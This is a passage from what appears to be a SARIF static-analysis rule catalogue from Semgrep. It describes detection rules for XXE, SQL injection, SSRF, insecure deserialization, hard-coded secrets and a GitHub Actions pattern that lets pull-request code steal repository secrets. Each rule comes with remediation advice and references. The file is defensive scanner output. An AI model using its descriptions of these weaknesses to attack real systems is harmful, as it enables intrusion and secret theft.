[https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf)\n","text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","id":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","name":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"help":{"markdown":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout)\n - [https://securitylab.github.com/research/github-actions-preventing-pwn-requests/](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)\n - [https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md](https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md)\n - [https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)\n","text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","id":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","name":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"help":{"markdown":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb)\n - [https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/](https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/)\n","text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization","id":"ruby.lang.security.cookie-serialization.cookie-serialization","name":"ruby.lang.security.cookie-serialization.cookie-serialization","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.cookie-serialization.cookie-serialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","id":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","name":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","id":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","name":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","id":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","name":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","id":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","name":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","id":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","name":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","id":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","name":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-dill-flask.tainted-dill-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"help":{"markdown":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open](https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open)\n","text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","id":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","name":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"help":{"markdown":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","id":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","name":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","id":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","name":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false","id":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","name":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-cookie-http-false.taint-cookie-http-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","id":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","name":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Stripe API Key detected"},"help":{"markdown":"Stripe API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Stripe API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","id":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","name":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"help":{"markdown":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST').\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping)\n - [https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING](https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING)\n","text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed 